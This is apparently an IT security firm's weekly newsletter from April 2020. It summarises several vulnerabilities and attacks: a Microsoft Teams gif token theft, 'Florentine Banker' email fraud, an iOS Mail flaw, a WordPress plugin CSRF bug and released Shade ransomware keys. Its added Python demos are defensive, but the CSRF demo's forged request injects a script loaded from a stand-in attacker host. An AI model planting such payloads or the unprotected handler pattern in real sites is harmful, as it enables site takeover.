Mirus IT Threat Thursday 30th April 2020

#ThreatThursday | 30th April 2020 | Cyber Security Updates

We’re back with your regular rundown of the week’s biggest cyber threats and vulnerabilities.

This week...

The Gif of the Gab: How Animated Gifs Could Compromise Your Teams Network

For those of us who can’t respond to a Teams message without slipping in our own contextual gif, this latest vulnerability discovered by CyberArk might force you to reconsider – or better yet, make sure your Teams client is on the latest version from Microsoft.

CyberArk discovered that, thanks to the way Teams handled its authentication token, an attacker could take over a victim’s Teams account and act as that user using nothing more than a simple gif. The token in question is a cookie that the Teams client sends to any subdomain of teams.microsoft.com, and CyberArk found two of those subdomains could be taken over by an attacker; an image hosted on one of them would therefore make the victim’s client hand over its token the moment the gif was displayed in a chat. CyberArk’s write-up explains the process far better than I could hope to, but the short version is that a malicious gif might have given attackers access to an organisation’s entire network of Teams users, and all it took was for one hapless victim to have the gif show up in their conversation.

So far, there is no sign the technique has been used in the wild, and Microsoft fixed the problem following a discreet tip-off from CyberArk, correcting the misconfigured subdomains and pushing mitigations – but now the technique is public, it’s only a matter of time before threat actors look for similar weaknesses, so make sure your Teams clients are running the latest update. You should probably go right ahead and do that.
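The reason a forgotten subdomain was enough to steal the token is ordinary browser cookie scoping: a cookie set for a parent domain is sent to every host beneath it, and the client cannot tell a legitimate subdomain from one an attacker has taken over. The script below is an added illustration of that behaviour using Python’s standard cookie jar; it is not CyberArk’s proof of concept, and the hostnames, cookie name and token value are invented for the demonstration.

```python
"""Why a stray subdomain mattered: a cookie scoped to a parent domain is sent
to every host under it, including one an attacker controls.

Added example, not CyberArk's research code. Hostnames, the cookie name and
the token value are all made up; only the cookie-scoping behaviour is real."""

from http.cookiejar import Cookie, CookieJar
from urllib.request import Request


def make_session_cookie(name, value, domain):
    """Build a domain-scoped cookie as a 'Set-Cookie: ...; Domain=...; Secure' header would."""
    return Cookie(
        version=0, name=name, value=value,
        port=None, port_specified=False,
        domain=domain, domain_specified=True, domain_initial_dot=domain.startswith("."),
        path="/", path_specified=True,
        secure=True, expires=None, discard=True,
        comment=None, comment_url=None, rest={},
    )


def cookie_header_for(jar, url):
    """Return the Cookie header the jar would attach to a request for url, or None."""
    req = Request(url)
    jar.add_cookie_header(req)
    return req.get_header("Cookie")


def leaked_to(jar, urls):
    """Return the subset of urls that would receive the token."""
    return [u for u in urls if cookie_header_for(jar, u) is not None]


# Hypothetical tenant: the chat client stores its token for the whole parent domain.
TOKEN_JAR = CookieJar()
TOKEN_JAR.set_cookie(make_session_cookie("authtoken", "demo-token", ".teams.example.com"))

# Constructed request targets: the real API host, a forgotten test subdomain an
# attacker could register, the bare parent, an unrelated host, and plain http.
CANDIDATES = [
    "https://teams.example.com/api/messages",
    "https://data-dev.teams.example.com/cat.gif",   # attacker-controlled image host
    "https://example.com/",                          # parent, outside the cookie scope
    "https://attacker.example.org/cat.gif",          # unrelated domain
    "http://data-dev.teams.example.com/cat.gif",     # Secure flag blocks plain http
]

if __name__ == "__main__":
    sent = leaked_to(TOKEN_JAR, CANDIDATES)
    for url in CANDIDATES:
        print("SENT   " if url in sent else "blocked", url)
```

The second line of output is the whole attack in miniature: the token goes to `data-dev.teams.example.com` exactly as it goes to the real API host, because to the cookie jar they are the same scope. The defences are to keep DNS free of dangling records and to scope tokens no wider than the hosts that actually need them.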

On the subject of gifs, I challenge anyone to find one better than this one of Her Majesty the Queen being delighted by a herd of cows.

The Florentine Banker is Neither from Florentine, Nor a Banker

British private equity firms are being targeted by a group of cyber criminals dubbed “The Florentine Banker”, whose business email compromise (BEC) attacks have earned them a cool $700,000; a significant portion of the $1.3 million they tricked three organisations into wire transferring, the remainder of which was recovered. Check Point Research shared their findings on the group in a report published last week.

The group has seen success before, nabbing $1 million from a Chinese venture capital firm using elaborate spear phishing techniques. Targeting several key employees at the victim company, the attackers first take control of a user’s email account by harvesting login details through phishing websites that mimic the real login page. Once inside the mailbox, they learn about the target and their connections, and create mailbox rules that quietly divert important threads, typically anything concerning invoices or payments, into a folder the victim rarely looks at, so the attackers can read those emails at leisure while the owner never sees them. This intelligence-gathering phase lets them craft more personalised, convincing emails for the next stage.

From there, the attackers can step into legitimate wire transfer conversations, using lookalike domains to impersonate both parties, and send seemingly legitimate requests that the transfer be redirected – into their own account, naturally.

It’s a smart spin on the otherwise crude methods of spear phishing but thankfully, these methods can be spotted – you just need to know what to look for. The lookalike domains the gang use, both for their phishing pages and for the impersonation emails, differ from the genuine ones by a letter or two, so check the sender’s actual address and the address bar carefully, not just the display name. A padlock alone proves nothing here: a phishing site can have a perfectly valid certificate, so compare the domain, character by character, against the real one.
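Both of the tells described above, the hiding-place mailbox rules and the lookalike domains, can be checked mechanically. The script below is an added example, not Check Point’s tooling or anything from the report; it runs both checks over constructed sample data. The rule records use an assumed, simplified shape (name, subject keywords, target folder, forwarding addresses); a real export from Exchange Online or Gmail carries more fields, but the logic is the same.

```python
"""Two BEC indicators, checked over constructed sample data: (1) inbox rules
that hide payment-related mail, and (2) sender domains that are near-misses
of a domain you actually do business with.

Added example, not code from the article or from Check Point. The rule
record shape, keyword lists and sample data are assumptions for illustration."""

# Words BEC actors typically filter on; assumption, tune to your own business.
PAYMENT_WORDS = {"invoice", "payment", "wire", "transfer", "bank", "remittance"}

# Folders where diverted mail goes unnoticed; assumption based on common tradecraft.
HIDING_FOLDERS = {"rss feeds", "rss subscriptions", "archive", "deleted items", "junk email"}


def is_suspicious_rule(rule, internal_domain):
    """Return the reasons a mailbox rule looks like BEC tradecraft (empty list = clean)."""
    reasons = []
    words = {w.lower() for w in rule.get("subject_words", [])}
    if words & PAYMENT_WORDS:
        folder = (rule.get("move_to_folder") or "").lower()
        if folder in HIDING_FOLDERS or rule.get("delete"):
            reasons.append("hides payment-related mail in %r" % (folder or "deleted"))
        if rule.get("mark_as_read"):
            reasons.append("marks payment-related mail as read")
    for addr in rule.get("forward_to", []):
        if not addr.lower().endswith("@" + internal_domain):
            reasons.append("forwards to external address %s" % addr)
    return reasons


def levenshtein(a, b):
    """Plain edit distance; short enough to write out rather than import."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(sender_domain, trusted_domains, max_distance=2):
    """Return the trusted domain this sender imitates, or None.

    An exact match is not a lookalike; a domain within a couple of edits
    (swapped, dropped or added letters, or a clipped TLD) is."""
    sender_domain = sender_domain.lower()
    if sender_domain in trusted_domains:
        return None
    for trusted in trusted_domains:
        if levenshtein(sender_domain, trusted) <= max_distance:
            return trusted
    return None


def audit(rules, senders, internal_domain, trusted_domains):
    """Run both checks; returns (flagged rule names, {sender: imitated domain})."""
    flagged = [r["name"] for r in rules if is_suspicious_rule(r, internal_domain)]
    lookalikes = {}
    for addr in senders:
        hit = lookalike_of(addr.rsplit("@", 1)[-1], trusted_domains)
        if hit:
            lookalikes[addr] = hit
    return flagged, lookalikes


# Constructed sample data, not taken from any real incident.
TRUSTED = {"example-capital.com", "partnerfund.com"}
SAMPLE_RULES = [
    {"name": "Newsletters", "subject_words": ["digest"], "move_to_folder": "Newsletters"},
    {"name": ".", "subject_words": ["invoice", "wire"], "move_to_folder": "RSS Feeds",
     "mark_as_read": True},
    {"name": "Backup", "subject_words": ["payment"], "forward_to": ["finance@partnerfund.co"]},
]
SAMPLE_SENDERS = ["cfo@example-capital.com", "cfo@examp1e-capital.com",
                  "deals@partnerfund.co", "news@unrelated.org"]

if __name__ == "__main__":
    flagged, lookalikes = audit(SAMPLE_RULES, SAMPLE_SENDERS, "example-capital.com", TRUSTED)
    for name in flagged:
        print("suspicious rule:", repr(name))
    for addr, imitated in lookalikes.items():
        print("lookalike sender %s imitates %s" % (addr, imitated))
```

The rule named “.” is the classic pattern: a near-invisible name, payment keywords, a destination folder nobody opens and mark-as-read so no unread count gives it away. A periodic run of the rules check across the finance team’s mailboxes, plus the domain check on inbound mail from payment counterparties, catches this group’s two main tricks before the redirected transfer is requested.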

Old Hack Emails Causing Harm, E-I-E-I-Phone

I cannot apologise enough for that headline.

Since as far back as iOS 6, released in that comparatively golden era of 2012, Apple devices have carried a remote code execution vulnerability in the built-in Mail app, triggered by nothing more than a specially crafted email. Worse still, ZecOps believes the bug has been exploited in the wild since at least January 2018, possibly earlier.

The vulnerability was revealed this week by ZecOps, whose research also identified six likely victims, all high-profile targets from Europe, North America and elsewhere. Given who was targeted, ZecOps isn’t ruling out nation-state involvement. The plot, she thickens.

Beyond the code execution itself, ZecOps noted that the malicious emails were themselves missing from the victims’ inboxes, which suggests the attackers have been keeping a close eye on those mailboxes and deleting anything that could expose the operation.

While only high-profile individuals appear to be targeted, every iPhone is vulnerable until the fix ships: Apple has included it in iOS 13.4.5, of which a beta version is available. Until then, it may be wise to disable Apple Mail and refrain from talking to any diplomats, oligarchs or powerful industrialists.

For more on this vulnerability, ZecOps’ own write up is rather excellent, providing both simplified and technical explanations.

Wonky Plugin Sparks Another WordPress Bug Hunt

WordPress plugins aren’t exactly rare, and with so many independent developers writing their own, vulnerabilities aren’t in short supply either. The latest, discovered by the team behind the Wordfence security plugin, could affect as many as 100,000 WordPress-powered sites using the Real-Time Find and Replace plugin. The flaw is a cross-site request forgery: the plugin didn’t verify that a request to change its settings actually came from its own settings page, so an attacker who could coerce a logged-in site administrator into clicking a crafted link could use the admin’s own browser to inject malicious code into every page the site serves.

The injected code is a nasty one as well: a script running on every page can create a new administrator account for the attacker, steal visitors’ session cookies or serve drive-by malware to anyone who lands on the site. Wordfence once again dives into the nerdy, technical stuff over on their blog page, here.

The update that fixes this, version 4.0.2, was made available on Monday; if your site uses the plugin, now would be the time to apply it.
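To see why a single click was enough, it helps to put the vulnerable pattern next to the fixed one. The script below is an added example, not the Real-Time Find and Replace plugin’s code or Wordfence’s analysis: it models a settings endpoint that trusts the admin’s session cookie alone, then the same endpoint guarded by a capability check and a per-user, per-action, time-limited nonce, which is the mechanism WordPress uses. The secret, the 12-hour tick, the user ids and the request shape are all invented for illustration.

```python
"""CSRF on a settings endpoint, vulnerable and hardened, side by side.

Added example, not the plugin's own code. The HMAC-over-tick nonce mirrors
how WordPress nonces work in spirit; SECRET, TICK_SECONDS, the session and
request shapes are assumptions for the demonstration."""

import hashlib
import hmac

SECRET = b"site-wide-secret-salt-assumed"   # the wp-config.php salts play this role
TICK_SECONDS = 12 * 60 * 60                 # nonces rotate twice a day, like WordPress


def make_nonce(action, user_id, now):
    """Nonce for (action, user) valid in the current 12-hour tick."""
    tick = now // TICK_SECONDS
    msg = ("%s|%d|%d" % (action, user_id, tick)).encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:16]


def verify_nonce(nonce, action, user_id, now):
    """Accept the current or the previous tick, so a page opened a while ago still works."""
    if not nonce:
        return False
    for age in (0, TICK_SECONDS):
        if hmac.compare_digest(nonce, make_nonce(action, user_id, now - age)):
            return True
    return False


# The "site": find/replace rules that get applied to every page's HTML.
RULES = []


def handle_unprotected(request, session):
    """Vulnerable pattern: the logged-in session cookie is the only check."""
    if session.get("user_id") is None:
        return "403 not logged in"
    RULES.append((request["find"], request["replace"]))
    return "200 saved"


def handle_protected(request, session, now):
    """Hardened pattern: capability check plus a nonce bound to user and action."""
    user_id = session.get("user_id")
    if user_id is None or not session.get("is_admin"):
        return "403 insufficient capability"
    if not verify_nonce(request.get("_nonce"), "save_rule", user_id, now):
        return "403 bad nonce"
    RULES.append((request["find"], request["replace"]))
    return "200 saved"


def csrf_demo(now=1_588_000_000):
    """Replay one forged request against both handlers; returns their responses."""
    RULES.clear()
    admin_session = {"user_id": 1, "is_admin": True}
    # What a link on an attacker's page makes the admin's browser send: the
    # session cookie rides along automatically, but no nonce can.
    forged = {"find": "</body>",
              "replace": "<script src='https://evil.example/x.js'></script></body>"}
    unprotected = handle_unprotected(forged, admin_session)
    protected = handle_protected(forged, admin_session, now)
    # The genuine settings page embeds a nonce minted for this admin and action.
    genuine = dict(forged, _nonce=make_nonce("save_rule", 1, now))
    legitimate = handle_protected(genuine, admin_session, now)
    stale = handle_protected(genuine, admin_session, now + 3 * TICK_SECONDS)
    return {"unprotected": unprotected, "protected": protected,
            "legitimate": legitimate, "stale": stale, "rules_saved": len(RULES)}


if __name__ == "__main__":
    for outcome, response in csrf_demo().items():
        print("%-12s %s" % (outcome, response))
```

The forged request carries the admin’s cookie, so the unprotected handler saves the injected script; the protected handler rejects it because an attacker’s page cannot read the nonce out of the site’s own settings page. The nonce is tied to the user and the action, so one minted for another user or another form is rejected too, and it ages out after the tick window.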

Throwing Shade? Not Anymore, as Cyber Criminals Unexpectedly Turn Over a New Leaf

The developers behind the Shade ransomware have, in an act of suspicious charity, apologised for creating their trojan, claim to have ceased all activity since November 2019, and released 750,000 decryption keys to help victims recover their files. Hmmm…

In a post on GitHub, presumably delivered with its eyes to the floor and its toes shyly circling the ground, the team stated:

 “We are the team which created a trojan-encryptor mostly known as Shade, Troldesh or Encoder.858. In fact, we stopped its distribution in the end of 2019.” the operators purportedly posted. “All other data related to our activity (including the source codes of the trojan) was irrevocably destroyed. We apologize to all the victims of the trojan and hope that the keys we published will help them to recover their data.”

You can read the full apology and removal instructions here. You might even flirt with the idea of clicking the links, which this suspicious mind has no intention of trying. Where we do agree with our turncoat trojaneers, however, is with the following:

“If you have any difficulties we advice (sic) you to wait until the antivirus companies release more convenient utilities for the decryption. Or you can ask for the free help on one of the thematic forums.”

While one wouldn’t count on a random forum-dweller for advice, waiting for the antivirus companies to build their own decryption tools from the released keys is by no means a bad idea. Yet however virtuous this act, one can’t help but treat it with the utmost caution. As SC Magazine points out, the GandCrab group ‘retired’ in June 2019, presumably got bored, and returned to ruin Travelex for everybody with that whole Sodinokibi business.

And Finally….

Owing to my deteriorating mental state during this period of forced isolation, we continue to judge the week’s threats based on how imaginative their names are: 

The Florentine Banker

Conjuring images of a moustache-twirling, cape-swishing Dickensian villain, one can’t imagine any baddie called ‘The Florentine Banker’ without picturing him and his band of street urchins making a hasty escape down a dark, cobbled alley, cackling into the 19th century night. “You’ll never catch me!”, his voice echoes from the smog-laden distance. “I’m the Florentine Banker!”. Glorious. 9/10


With a single change of vowel, Shade could have been known as ‘Shady’ and had a moniker more suited to its cruel intentions. And while I daren’t imply that this has ruined the developers’ reputation, the fact that they’ve since retreated with their tails between their legs is a correlation that can’t be overlooked. 3/10

Aaaaaaaand we’re done.

As always, we’ll return on a Thursday near you, with more of the week’s cyber security news.

